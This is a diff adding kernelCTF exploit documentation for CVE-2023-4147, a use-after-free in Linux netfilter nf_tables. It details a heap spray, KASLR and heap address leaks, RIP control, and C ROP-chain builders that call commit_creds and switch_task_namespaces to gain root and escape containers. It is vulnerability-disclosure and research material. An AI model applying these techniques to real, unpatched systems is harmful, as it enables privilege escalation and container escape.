google · kevinrich1337 · Jul 11, 2024 · Jul 11, 2024 · Sep 29, 2024 · Sep 29, 2024
diff --git a/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/exploit.md
@@ -0,0 +1,377 @@
+### Triggering Vulnerability
+
+`nf_tables_newrule` disallows adding a new rule to the bound chain [1], but when adding a rule with `NFTA_RULE_CHAIN_ID` a rule is added to the bound chain [2].
+
+```c
+static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+			     const struct nlattr * const nla[])
+{
+    ...
+
+	table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask,
+				 NETLINK_CB(skb).portid);
+	if (IS_ERR(table)) {
+		NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
+		return PTR_ERR(table);
+	}
+
+	if (nla[NFTA_RULE_CHAIN]) {
+		chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
+					 genmask);
+		if (IS_ERR(chain)) {
+			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
+			return PTR_ERR(chain);
+		}
+		if (nft_chain_is_bound(chain))                  // [1]
+			return -EOPNOTSUPP;
+
+	} else if (nla[NFTA_RULE_CHAIN_ID]) {
+		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);     // [2]
+		if (IS_ERR(chain)) {
+			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
+			return PTR_ERR(chain);
+		}
+	} else {
+		return -EINVAL;
+	}
+```
+
+### LTS Exploit
+
+#### KASLR Bypass
+
+The KASLR address is leaked through `chain->name`, which is stored in the verdict data of the immediate expr (`nft_immediate_expr.data.verdict`). The leak process is as follows:
+
+- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
+- Create a rule in `Base` with an immediate expr referencing the `Vulnerable`.
+- Create a rule in `Vulnerable` with an immediate expr referencing `Victim`.
+- Trigger the vulnerability by replacing the rule in `Vulnerable`. This results in the `Victim` having a reference count of -1.
+- Create an immediate expr in `Base` that references to the Victim, making the `Victim`'s reference count 0, and destroy the `Victim`.
+- Spray counter exprs (struct nft_expr) to place it at `Victim`'s chain->name. At this time, the counter exprs are allocated in the `kmalloc-cg-16`.
+- We dump the immediate expr of `Base` using `GETRULE` command, we can get the ops address of counter expr through the freed `chain->name` to get the kernel base address [3].
+
+```c
+int nft_verdict_dump(struct sk_buff *skb, int type, const struct nft_verdict *v)
+{
+    struct nlattr *nest;
+
+    nest = nla_nest_start_noflag(skb, type);
+    if (!nest)
+        goto nla_put_failure;
+
+    if (nla_put_be32(skb, NFTA_VERDICT_CODE, htonl(v->code)))
+        goto nla_put_failure;
+
+    switch (v->code) {
+    case NFT_JUMP:
+    case NFT_GOTO:
+        if (nla_put_string(skb, NFTA_VERDICT_CHAIN,
+                    v->chain->name))  // [3]
+            goto nla_put_failure;
+    }
+    nla_nest_end(skb, nest);
+    return 0;
+
+nla_put_failure:
+    return -1;
+}
+```
+
+#### Heap Address Leak
+
+We leak the heap address in the same way as we leak the kernel base address. To leak the heap address, we sprayed the `nft_rule` instead of counter expr. We place `nft_rule` in freed `Victim`'s `nft_chain->name` and dump the rule of the `Base`. As a result, we can read the heap address stored in `nft_rule->list` through `Victim`'s `nft_chain->name`. We put the address of the `kmalloc-cg-96` object in `list->next` and the address of the `kmalloc-cg-192` object in `list->prev` by creating `nft_rules`. The size of the `nft_rule` can be adjusted by adding multiple `nft_exprs` inside the `nft_rule`. Since data of type string is used for leaking, we repeated the entire exploit until the heap address does not contain null.
+
+#### RIP Control
+
+We use `nft_chain->blob_gen_0` to control the RIP. The `nft_chain->blob_gen_0` is used when evaluating packets in the `nft_do_chain` function [4].
+
+```c
+nft_do_chain(struct nft_pktinfo *pkt, void *priv)
+{
+    ...
+do_chain:
+    if (genbit)
+        blob = rcu_dereference(chain->blob_gen_1);
+    else
+        blob = rcu_dereference(chain->blob_gen_0);  // [4]
+
+    rule = (struct nft_rule_dp *)blob->data;
+    last_rule = (void *)blob->data + blob->size;
+next_rule:
+    regs.verdict.code = NFT_CONTINUE;
+    for (; rule < last_rule; rule = nft_rule_next(rule)) {
+        nft_rule_dp_for_each_expr(expr, last, rule) {
+            if (expr->ops == &nft_cmp_fast_ops)
+                nft_cmp_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_cmp16_fast_ops)
+                nft_cmp16_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_bitwise_fast_ops)
+                nft_bitwise_fast_eval(expr, &regs);
+            else if (expr->ops != &nft_payload_fast_ops ||
+                    !nft_payload_fast_eval(expr, &regs, pkt))
+                expr_call_ops_eval(expr, &regs, pkt);
+
+            if (regs.verdict.code != NFT_CONTINUE)
+                break;
+        }
+    ...
+```
+
+To do this, we assign `chain->blob_gen_0` to `kmalloc-cg-64` and trigger the vulnerability. `chain->blob_gen_0` is allocated in the `nf_tables_chain_alloc_rules` when creating new chain [5]. `chain->blob_gen_0` is allocated from the `nf_tables_chain_alloc_rules` when creating a new chain [5].
+
+```c
+static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+			      u8 policy, u32 flags,
+			      struct netlink_ext_ack *extack)
+{
+    ...
+	data_size = offsetof(struct nft_rule_dp, data);	/* last rule */
+	blob = nf_tables_chain_alloc_rules(data_size);      // [5]
+	if (!blob) {
+		err = -ENOMEM;
+		goto err_destroy_chain;
+	}
+```
+
+The size used by `kvmalloc` [6] is 40, `offsetof(struct nft_rule_dp, data)` + `sizeof(struct nft_rule_blob)` + `sizeof(struct nft_rules_old)` (8 + 24 + 8), the `blob` object is allocated in `kmalloc-cg-64`.
+
+```c
+static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size)
+{
+	struct nft_rule_blob *blob;
+
+	/* size must include room for the last rule */
+	if (size < offsetof(struct nft_rule_dp, data))
+		return NULL;
+
+	size += sizeof(struct nft_rule_blob) + sizeof(struct nft_rules_old);
+	if (size > INT_MAX)
+		return NULL;
+
+	blob = kvmalloc(size, GFP_KERNEL_ACCOUNT);      // [6]
+	if (!blob)
+		return NULL;
+
+	blob->size = 0;
+	nft_last_rule(blob, blob->data);
+
+	return blob;
+}
+```
+
+We then spray the `udata` of the `struct nft_table` and place it in freed `blob_gen_0`. Finally, when a packet is sent, a sprayed fake ops address is referenced, resulting in RIP control [7].
+
+```c
+static void expr_call_ops_eval(const struct nft_expr *expr,
+                    struct nft_regs *regs,
+                    struct nft_pktinfo *pkt)
+{
+#ifdef CONFIG_RETPOLINE
+    unsigned long e = (unsigned long)expr->ops->eval;
+#define X(e, fun) \
+    do { if ((e) == (unsigned long)(fun)) \
+        return fun(expr, regs, pkt); } while (0)  // [7]
+
+    X(e, nft_payload_eval);
+    X(e, nft_cmp_eval);
+    X(e, nft_counter_eval);
+    X(e, nft_meta_get_eval);
+    X(e, nft_lookup_eval);
+    X(e, nft_range_eval);
+    X(e, nft_immediate_eval);
+    X(e, nft_byteorder_eval);
+    X(e, nft_dynset_eval);
+    X(e, nft_rt_get_eval);
+    X(e, nft_bitwise_eval);
+#undef  X
+#endif /* CONFIG_RETPOLINE */
+    expr->ops->eval(expr, regs, pkt);
+}
+```
+
+#### Post RIP
+
+Store the ROP payload below to the `kmalloc-cg-96` and `kmalloc-cg-192` addresses leaked above, and execute it.
+
+```c
+void make_payload(uint64_t* data){
+    int i = 0;
+
+    data[i++] = kbase + push_rbx_pop_rsp;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + init_cred_off;
+    data[i++] = kbase + commit_creds_off;
+
+    // current = find_task_by_vpid(getpid())
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = getpid();
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = 0x474;
+    data[i++] = kbase + add_rax_rsi_ret;
+
+    data[i++] = kbase + pop_rsp_ret;
+    data[i++] = heap_addr1+0x20;
+}
+
+void make_payload2(uint64_t* data){
+    int i = 0;
+
+    // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+    data[i++] = kbase + pop_rcx_ret;
+    data[i++] = -0xffff;
+    data[i++] = kbase + mov_rax_rcx_ret;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = 1;
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + mov_rdi_rax_ret;
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = kbase + init_nsproxy_off;
+    data[i++] = kbase + switch_task_namespaces_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
+    data[i++] = 0;                  // rax
+    data[i++] = 0;                  // rdx
+    data[i++] = _user_rip;          // user_rip
+    data[i++] = _user_cs;           // user_cs
+    data[i++] = _user_rflags;       // user_rflags
+    data[i++] = _user_sp;           // user_sp
+    data[i++] = _user_ss;           // user_ss
+}
+```
+
+### COS Exploit
+
+#### Information Leak
+
+The KASLR address and heap address are leaked through `nft_rule` allocated in `kmalloc-cg-192`. The leak process is as follows:
+
+- Create four chains, `Base`, `Vulnerable`, `Chain_Victim`, and `Target`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
+- Create chains `Chain_Victim2_n`.
+- Create an anonymous rhash set `Set_Victim`.
+- Create a set element in set `Set_Victim`. The element is allocated in `kmalloc-cg-256`.
+
+- Create rules `Rule_Victim2_n` in `Chain_Victim2_n`. The rules are allocated in `kmalloc-cg-192`.
+- Create rules `Rule_Targret_n` in `Target` with an `counter expr`. The rules are allocated in `kmalloc-cg-192`. The kbase and heap address in the `Rule_Targret_n` are used for leak in following step. We can read the target rule allocated right after the `Rule_Victim2_n`.
+- Create rules `Rule_Victim_n` in `Chain_Victim` with an `immediate expr` referencing the `Chain_Victim2_n`. The rules are allocated in `kmalloc-cg-256`.
+
+- Create a rule `R1` in `Base` with an `immediate expr` referencing the `Vulnerable`.
+- Create a rule `R2` in `Vulnerable` with a `lookup expr` referencing the `Set_Victim`.
+- Delete the `R1`. This results in `Set_Victim` being free from the destroy phase.
+- Delete the set element in `Set_Victim`. This results in a UAF that references `Set_Victim` that was freed in previous step.
+
+```c
+static void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
+				       const struct nft_set *set, void *elem)
+{
+	struct nft_set_ext *ext = nft_set_elem_ext(set, elem);          // [8]
+
+	if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))
+		nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));      // [9]
+
+	kfree(elem);
+}
+```
+
+```c
+static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set,
+						   void *elem)
+{
+	return elem + set->ops->elemsize;                       // [10]
+}
+```
+
+- Spray rhash sets `Set_Spray_n`. When destroying an `nf_tables_set_elem_destroy` element, `nft_set_ext` is used [8], and `nft_set_ext` is retrieved by referencing `set->ops->elemsize` [10]. Thus, a rhash set with `elemsize` of 8 is overwritten by an rbtree set with `elemsize` of 24, causing the `nft_set_elem_expr_destroy` to reference the wrong `nft_set_ext`. We manipulate the offset to destroy the `immedieate expr` in `Rule_Victim_n`, that is allocated after the element, in [9]. This frees `Rule_Victim2_n` in `Chain_Victim2_n`. However, `Chain_Victim2_n` and `Rule_Victim2_n` are remain accessible.
+- Spray fake rules using `nft_table->udata` into freed `Rule_Victim2_n` (`kmalloc-cg-192`).
+- Get fake rule to obtain kbase (`nft_counter_ops`) and heap address (`nft_rule.list.next` and `nft_rule.list.prev`).
+
+#### RIP Control
+
+- Create two chains, `Base`, `Vulnerable`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
+- Create an anonymous rbtree set `Set_Victim`.
+- Create a set element in set `Set_Victim`. The element is allocated in `kmalloc-cg-256`.
+- Spray fake exprs using `table->udata` in `kmalloc-cg-256`.
+- Create a rule `R1` in `Base` with an `immediate expr` referencing the `Vulnerable`.
+- Create a rule `R2` in `Vulnerable` with a `lookup expr` referencing the `Set_Victim`.
+- Delete the `R1`. This results in `Set_Victim` being free from the destroy phase.
+- Delete the set element in `Set_Victim`. This results in a UAF that references `Set_Victim` that was freed in previous step.
+- Create rhash sets `Set_Spray_n`. As a result, the RIP is controlled by referencing the fake expr in the `nf_tables_expr_destroy` [11].
+
+```c
+static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
+				   struct nft_expr *expr)
+{
+	const struct nft_expr_type *type = expr->ops->type;
+
+	if (expr->ops->destroy)
+		expr->ops->destroy(ctx, expr);      //  [11]
+	module_put(type->owner);
+}
+```
+
+#### Post RIP
+
+Since RIP control is performed by the destroy worker, we split the ROP into two phases. In the first ROP payload, we overwrite `counter_ops` with `fake ops` address.
+
+```c
+void make_payload(uint64_t* data){
+    int i = 0;
+
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + counter_ops_addr_off;
+
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = heap_addr+0x40;             // fake ops
+    data[i++] = kbase + mov_ptr_rdi_rsi;
+    data[i++] = kbase + msleep_off;
+
+    data[i++] = 0;
+    data[i++] = kbase + push_rbx_pop_rsp_pop_rbp_ret;
+    data[i++] = 0;
+    data[i++] = 0;
+    data[i++] = 8;                          // ops.size
+    data[i++] = kbase + push_rsi_jmp_rsi_f; // ops.init
+}
+```
+
+Then, when generating `counter expr`, fake `ops->init` is called and the second ROP payload is executed to get the root shell.
+
+```c
+void make_payload2(uint64_t* data){
+    int i = 0;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + init_cred_off;
+    data[i++] = kbase + commit_creds_off;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = 1;
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + mov_rdi_rax_ret;
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = kbase + init_nsproxy_off;
+    data[i++] = kbase + switch_task_namespaces_off;
+
+    data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
+    data[i++] = 0;                  // rax
+    data[i++] = 0;                  // rdx
+    data[i++] = _user_rip;          // user_rip
+    data[i++] = _user_cs;           // user_cs
+    data[i++] = _user_rflags;       // user_rflags
+    data[i++] = _user_sp;           // user_sp
+    data[i++] = _user_ss;           // user_ss
+}
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/vulnerability.md
@@ -0,0 +1,12 @@
+- Requirements:
+    - Capabilites: CAP_NET_ADMIN
+    - Kernel configuration: CONFIG_NETFILTER=y, CONFIG_NF_TABLES=y
+    - User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d0e2c7de92c7
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0ebc1064e4874d5987722a2ddbc18f94aa53b211
+- Affected Version: v5.9-rc1 - v6.5-rc3
+- Affected Component: net/netfilter
+- Syscall to disable: disallow unprivileged username space
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4147
+- Cause: Use-After-Free
+- Description: A use-after-free flaw was found in the Linux kernel's Netfilter functionality when adding a rule with NFTA_RULE_CHAIN_ID. This flaw allows a local user to crash or escalate their privileges on the system.